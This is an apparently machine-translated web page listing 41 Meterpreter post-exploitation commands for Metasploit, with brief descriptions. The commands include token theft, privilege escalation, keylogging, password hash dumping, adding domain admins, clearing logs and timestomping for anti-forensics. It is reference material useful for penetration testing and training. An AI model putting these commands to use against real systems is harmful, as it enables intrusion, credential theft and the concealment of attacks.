Meterpreter command in Metasploit

Source: Internet
Author: User

Meterpreter is a killer in the Metasploit framework, usually used as an attack payload after a vulnerability overflow, and the attack payload can be returned to us as a control channel after the vulnerability is triggered.

Common Meterpreter Commands

  1. Run ScriptName runs the Meterpreter script, where you can see all the script names in the Scripts/meterpreter directory.
  2. SysInfo lists system information for the managed host.
  3. LS lists the file and folder information for the target host.
  4. Use Priv to load the elevation of Privilege extension module to extend the Meterpreter library.
  5. PS Displays all running processes and associated user accounts.
  6. Migrate PID is migrated to a specified process ID (PID can be obtained from the target host via PS).
  7. Use Incognito loads the Incognito function (used to steal the target host's token or impersonate the user).
  8. List_tokens-u lists the available tokens for the target host user.
  9. LIST_TOKENS-G lists the available tokens for the target host user group.
  10. Impersonate_token Domain_name\\username the available tokens on the target host.
  11. The Steal_token PID steals the available tokens for a given process and makes a token impersonation.
  12. Drop_token Stop impersonating the current token.
  13. Getsystem uses various attack vectors to elevate system user rights.
  14. The shell runs an interactive shell with all available tokens.
  15. Execute-f Cmd.exe-i executes the cmd.exe command and interacts.
  16. Execute-f Cmd.exe-i-T executes the cmd command with all available tokens.
  17. Execute-f cmd.exe-i-h-t executes the cmd command with all the available tokens and hides the process.
  18. Rev2self back to the initialized user account that controls the target host.
  19. The reg command interacts, creates, deletes, queries, and so on in the target host registry.
  20. Setdesktop number switches to another user interface (the feature is based on which users are logged on).
  21. Screenshot to the screen of the target host.
  22. Upload file uploads files to the target host
  23. Download file downloads files from the target host.
  24. Keyscan_start enable keylogger for remote target host.
  25. Keyscan_dump stores the keylogger captured on the target host.
  26. Keyscan_stop stops the Keylogger function for the target host.
  27. Getprivs as much as possible to get privileges on the target host.
  28. Uictl enable Keyboard/mouse takes over the target host's keyboard and mouse.
  29. Background your current Meterpreter shell to the background.
  30. Hashdump Export the password hash value in the destination host.
  31. Use sniffer to load the sniffer module.
  32. Sniffer_interfaces lists all open network interfaces of the target host.
  33. Sniffer_dump InterfaceID pcapname start sniffing on the target host.
  34. Sniffer_stats InterfaceID Gets the statistics that are implementing the sniffer network interface.
  35. Sniffer_start InterfaceID Packet-buffer initiates a sniffer on the target host for a specific range of packet buffers.
  36. Sniffer_stop InterfaceID stop sniffing.
  37. Add_user username password-h IP Adds a user to the remote destination host.
  38. Add_group_user "Domain Admins" username-h IP adds the user to the Domain Admins group of the target host.
  39. Clearev clears the log records on the target host.
  40. Timestomp modify file properties, such as modifying the creation time of a file (anti-forensics investigation).
  41. Reboot restart the target host.

Meterpreter command in Metasploit

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.